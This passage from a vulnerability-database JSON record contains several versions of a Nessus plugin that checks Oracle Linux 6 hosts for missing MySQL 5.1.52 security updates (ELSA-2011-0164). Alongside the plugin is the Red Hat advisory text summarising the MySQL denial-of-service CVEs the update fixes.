flaw to crash mysqld.\n(CVE-2010-3679)\n\nA flaw in the way MySQL processed SQL queries containing IN or CASE\nstatements, when a NULL argument was provided as one of the arguments\nto the query, could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3678)\n\nA flaw in the way MySQL processed JOIN queries that attempt to\nretrieve data from a unique SET column could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3677)\n\nNote: CVE-2010-3840, CVE-2010-3838, CVE-2010-3837, CVE-2010-3835,\nCVE-2010-3833, CVE-2010-3682, CVE-2010-3681, CVE-2010-3680,\nCVE-2010-3678, and CVE-2010-3677 only cause a temporary denial of\nservice, as mysqld was automatically restarted after each crash.\n\nThese updated packages upgrade MySQL to version 5.1.52. Refer to the\nMySQL release notes for a full list of changes :\n\nhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\n\nAll MySQL users should upgrade to these updated packages, which\ncorrect these issues. After installing this update, the MySQL server\ndaemon (mysqld) will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-February/001871.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mysql packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-embedded-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"mysql-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-bench-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-devel-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-embedded-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-embedded-devel-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-libs-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-server-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-test-5.1.52-1.el6_0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mysql / mysql-bench / mysql-devel / mysql-embedded / etc\");\n}\n", "title": "Oracle Linux 6 : mysql (ELSA-2011-0164)", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 5, "lastseen": "2019-01-03T10:35:42"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3679", "CVE-2010-3836", "CVE-2010-3683", "CVE-2010-3677", "CVE-2010-3838"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "From Red Hat Security Advisory 2011:0164 :\n\nUpdated mysql packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon (mysqld) and many client programs and libraries.\n\nThe MySQL PolyFromWKB() function did not sanity check Well-Known Binary (WKB) data, which could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3840)\n\nA flaw in the way MySQL processed certain JOIN queries could allow a remote, authenticated attacker to cause excessive CPU use (up to 100%), if a stored procedure contained JOIN queries, and that procedure was executed twice in sequence. (CVE-2010-3839)\n\nA flaw in the way MySQL processed queries that provide a mixture of numeric and longblob data types to the LEAST or GREATEST function, could allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3838)\n\nA flaw in the way MySQL processed PREPARE statements containing both GROUP_CONCAT and the WITH ROLLUP modifier could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3837)\n\nMySQL did not properly pre-evaluate LIKE arguments in view prepare mode, possibly allowing a remote, authenticated attacker to crash mysqld. (CVE-2010-3836)\n\nA flaw in the way MySQL processed statements that assign a value to a user-defined variable and that also contain a logical value evaluation could allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3835)\n\nA flaw in the way MySQL evaluated the arguments of extreme-value functions, such as LEAST and GREATEST, could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3833)\n\nA flaw in the way MySQL handled LOAD DATA INFILE requests allowed MySQL to send OK packets even when there were errors. (CVE-2010-3683)\n\nA flaw in the way MySQL processed EXPLAIN statements for some complex SELECT queries could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3682)\n\nA flaw in the way MySQL processed certain alternating READ requests provided by HANDLER statements could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3681)\n\nA flaw in the way MySQL processed CREATE TEMPORARY TABLE statements that define NULL columns when using the InnoDB storage engine, could allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3680)\n\nA flaw in the way MySQL processed certain values provided to the BINLOG statement caused MySQL to read unassigned memory. A remote, authenticated attacker could possibly use this flaw to crash mysqld.\n(CVE-2010-3679)\n\nA flaw in the way MySQL processed SQL queries containing IN or CASE statements, when a NULL argument was provided as one of the arguments to the query, could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3678)\n\nA flaw in the way MySQL processed JOIN queries that attempt to retrieve data from a unique SET column could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3677)\n\nNote: CVE-2010-3840, CVE-2010-3838, CVE-2010-3837, CVE-2010-3835, CVE-2010-3833, CVE-2010-3682, CVE-2010-3681, CVE-2010-3680, CVE-2010-3678, and CVE-2010-3677 only cause a temporary denial of service, as mysqld was automatically restarted after each crash.\n\nThese updated packages upgrade MySQL to version 5.1.52. Refer to the MySQL release notes for a full list of changes :\n\nhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\n\nAll MySQL users should upgrade to these updated packages, which correct these issues. After installing this update, the MySQL server daemon (mysqld) will be restarted automatically.", "edition": 1, "enchantments": {}, "hash": "9c64e073ccf9796b9e1c1dab78b9f64dd4a4d15b5578eb126b97c997efc75b1a", "hashmap": [{"hash": "3c5afcca913658450e43fe2cc0af5e77", "key": "description"}, {"hash": "8754a4c79639fe9e72913f51a467720c", "key": "references"}, {"hash": "28a94886eaa4ff2b55031e0322ec393e", "key": "cvelist"}, {"hash": "4579da10f367382f6c82a034cac778ad", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "44a7c372e4fd70f63bab3c202bc2425d", "key": "title"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0db193a0effe2d65dffecdb5e4d9c241", "key": "published"}, {"hash": "01747313503f2ddd0055183b17255a2e", "key": "href"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "952a2e8fc7d51d5cdf3746dd935403dd", "key": "sourceData"}, {"hash": "62f567f562bbeddeaf1e6db6eec3283c", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=68184", "id": "ORACLELINUX_ELSA-2011-0164.NASL", "lastseen": "2016-09-26T17:26:30", "modified": "2016-05-06T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.2", "pluginID": "68184", "published": "2013-07-12T00:00:00", "references": ["https://oss.oracle.com/pipermail/el-errata/2011-February/001871.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2011:0164 and \n# Oracle Linux Security Advisory ELSA-2011-0164 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68184);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2016/05/06 16:53:48 $\");\n\n script_cve_id(\"CVE-2010-3677\", \"CVE-2010-3678\", \"CVE-2010-3679\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3683\", \"CVE-2010-3833\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n script_bugtraq_id(42596, 42598, 42599, 42625, 42633, 42638, 42646, 43676);\n script_xref(name:\"RHSA\", value:\"2011:0164\");\n\n script_name(english:\"Oracle Linux 6 : mysql (ELSA-2011-0164)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2011:0164 :\n\nUpdated mysql packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists\nof the MySQL server daemon (mysqld) and many client programs and\nlibraries.\n\nThe MySQL PolyFromWKB() function did not sanity check Well-Known\nBinary (WKB) data, which could allow a remote, authenticated attacker\nto crash mysqld. (CVE-2010-3840)\n\nA flaw in the way MySQL processed certain JOIN queries could allow a\nremote, authenticated attacker to cause excessive CPU use (up to\n100%), if a stored procedure contained JOIN queries, and that\nprocedure was executed twice in sequence. (CVE-2010-3839)\n\nA flaw in the way MySQL processed queries that provide a mixture of\nnumeric and longblob data types to the LEAST or GREATEST function,\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3838)\n\nA flaw in the way MySQL processed PREPARE statements containing both\nGROUP_CONCAT and the WITH ROLLUP modifier could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3837)\n\nMySQL did not properly pre-evaluate LIKE arguments in view prepare\nmode, possibly allowing a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3836)\n\nA flaw in the way MySQL processed statements that assign a value to a\nuser-defined variable and that also contain a logical value evaluation\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3835)\n\nA flaw in the way MySQL evaluated the arguments of extreme-value\nfunctions, such as LEAST and GREATEST, could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3833)\n\nA flaw in the way MySQL handled LOAD DATA INFILE requests allowed\nMySQL to send OK packets even when there were errors. (CVE-2010-3683)\n\nA flaw in the way MySQL processed EXPLAIN statements for some complex\nSELECT queries could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3682)\n\nA flaw in the way MySQL processed certain alternating READ requests\nprovided by HANDLER statements could allow a remote, authenticated\nattacker to crash mysqld. (CVE-2010-3681)\n\nA flaw in the way MySQL processed CREATE TEMPORARY TABLE statements\nthat define NULL columns when using the InnoDB storage engine, could\nallow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3680)\n\nA flaw in the way MySQL processed certain values provided to the\nBINLOG statement caused MySQL to read unassigned memory. A remote,\nauthenticated attacker could possibly use this flaw to crash mysqld.\n(CVE-2010-3679)\n\nA flaw in the way MySQL processed SQL queries containing IN or CASE\nstatements, when a NULL argument was provided as one of the arguments\nto the query, could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3678)\n\nA flaw in the way MySQL processed JOIN queries that attempt to\nretrieve data from a unique SET column could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3677)\n\nNote: CVE-2010-3840, CVE-2010-3838, CVE-2010-3837, CVE-2010-3835,\nCVE-2010-3833, CVE-2010-3682, CVE-2010-3681, CVE-2010-3680,\nCVE-2010-3678, and CVE-2010-3677 only cause a temporary denial of\nservice, as mysqld was automatically restarted after each crash.\n\nThese updated packages upgrade MySQL to version 5.1.52. Refer to the\nMySQL release notes for a full list of changes :\n\nhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\n\nAll MySQL users should upgrade to these updated packages, which\ncorrect these issues. After installing this update, the MySQL server\ndaemon (mysqld) will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-February/001871.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mysql packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-embedded-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"mysql-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-bench-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-devel-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-embedded-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-embedded-devel-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-libs-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-server-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-test-5.1.52-1.el6_0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mysql / mysql-bench / mysql-devel / mysql-embedded / etc\");\n}\n", "title": "Oracle Linux 6 : mysql (ELSA-2011-0164)", "type": "nessus", "viewCount": 0}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:26:30"}], "edition": 6, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "52a589bac1c2c4d1b20742a5e936a6a0"}, {"key": "cvelist", "hash": "28a94886eaa4ff2b55031e0322ec393e"}, {"key": "cvss", "hash": "84813b1457b92d6ba1174abffbb83a2f"}, {"key": "description", "hash": "92842015a6478fb9b86007b35b2ef669"}, {"key": "href", "hash": "01747313503f2ddd0055183b17255a2e"}, {"key": "modified", "hash": "0e4da7304285381f16759537beaada44"}, {"key": "naslFamily", "hash": "e31ed89ab0cbb68ce2c40f17ec1e5483"}, {"key": "pluginID", "hash": "4579da10f367382f6c82a034cac778ad"}, {"key": "published", "hash": "0db193a0effe2d65dffecdb5e4d9c241"}, {"key": "references", "hash": "8754a4c79639fe9e72913f51a467720c"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "bc851413348a020ba268848d2e684f0c"}, {"key": "title", "hash": "44a7c372e4fd70f63bab3c202bc2425d"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "926cb4054fa4048399c464d1644baa5356bab32849ce9882c7ab036c9528c2b0", "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2011:0164 and \n# Oracle Linux Security Advisory ELSA-2011-0164 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68184);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/01/02 16:37:55\");\n\n script_cve_id(\"CVE-2010-3677\", \"CVE-2010-3678\", \"CVE-2010-3679\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3683\", \"CVE-2010-3833\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n script_bugtraq_id(42596, 42598, 42599, 42625, 42633, 42638, 42646, 43676);\n script_xref(name:\"RHSA\", value:\"2011:0164\");\n\n script_name(english:\"Oracle Linux 6 : mysql (ELSA-2011-0164)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2011:0164 :\n\nUpdated mysql packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists\nof the MySQL server daemon (mysqld) and many client programs and\nlibraries.\n\nThe MySQL PolyFromWKB() function did not sanity check Well-Known\nBinary (WKB) data, which could allow a remote, authenticated attacker\nto crash mysqld. (CVE-2010-3840)\n\nA flaw in the way MySQL processed certain JOIN queries could allow a\nremote, authenticated attacker to cause excessive CPU use (up to\n100%), if a stored procedure contained JOIN queries, and that\nprocedure was executed twice in sequence. (CVE-2010-3839)\n\nA flaw in the way MySQL processed queries that provide a mixture of\nnumeric and longblob data types to the LEAST or GREATEST function,\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3838)\n\nA flaw in the way MySQL processed PREPARE statements containing both\nGROUP_CONCAT and the WITH ROLLUP modifier could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3837)\n\nMySQL did not properly pre-evaluate LIKE arguments in view prepare\nmode, possibly allowing a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3836)\n\nA flaw in the way MySQL processed statements that assign a value to a\nuser-defined variable and that also contain a logical value evaluation\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3835)\n\nA flaw in the way MySQL evaluated the arguments of extreme-value\nfunctions, such as LEAST and GREATEST, could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3833)\n\nA flaw in the way MySQL handled LOAD DATA INFILE requests allowed\nMySQL to send OK packets even when there were errors. (CVE-2010-3683)\n\nA flaw in the way MySQL processed EXPLAIN statements for some complex\nSELECT queries could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3682)\n\nA flaw in the way MySQL processed certain alternating READ requests\nprovided by HANDLER statements could allow a remote, authenticated\nattacker to crash mysqld. (CVE-2010-3681)\n\nA flaw in the way MySQL processed CREATE TEMPORARY TABLE statements\nthat define NULL columns when using the InnoDB storage engine, could\nallow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3680)\n\nA flaw in the way MySQL processed certain values provided to the\nBINLOG statement caused MySQL to read unassigned memory. A remote,\nauthenticated attacker could possibly use this flaw to crash mysqld.\n(CVE-2010-3679)\n\nA flaw in the way MySQL processed SQL queries containing IN or CASE\nstatements, when a NULL argument was provided as one of the arguments\nto the query, could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3678)\n\nA flaw in the way MySQL processed JOIN queries that attempt to\nretrieve data from a unique SET column could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3677)\n\nNote: CVE-2010-3840, CVE-2010-3838, CVE-2010-3837, CVE-2010-3835,\nCVE-2010-3833, CVE-2010-3682, CVE-2010-3681, CVE-2010-3680,\nCVE-2010-3678, and CVE-2010-3677 only cause a temporary denial of\nservice, as mysqld was automatically restarted after each crash.\n\nThese updated packages upgrade MySQL to version 5.1.52. Refer to the\nMySQL release notes for a full list of changes :\n\nhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\n\nAll MySQL users should upgrade to these updated packages, which\ncorrect these issues. After installing this update, the MySQL server\ndaemon (mysqld) will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-February/001871.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mysql packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-embedded-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = 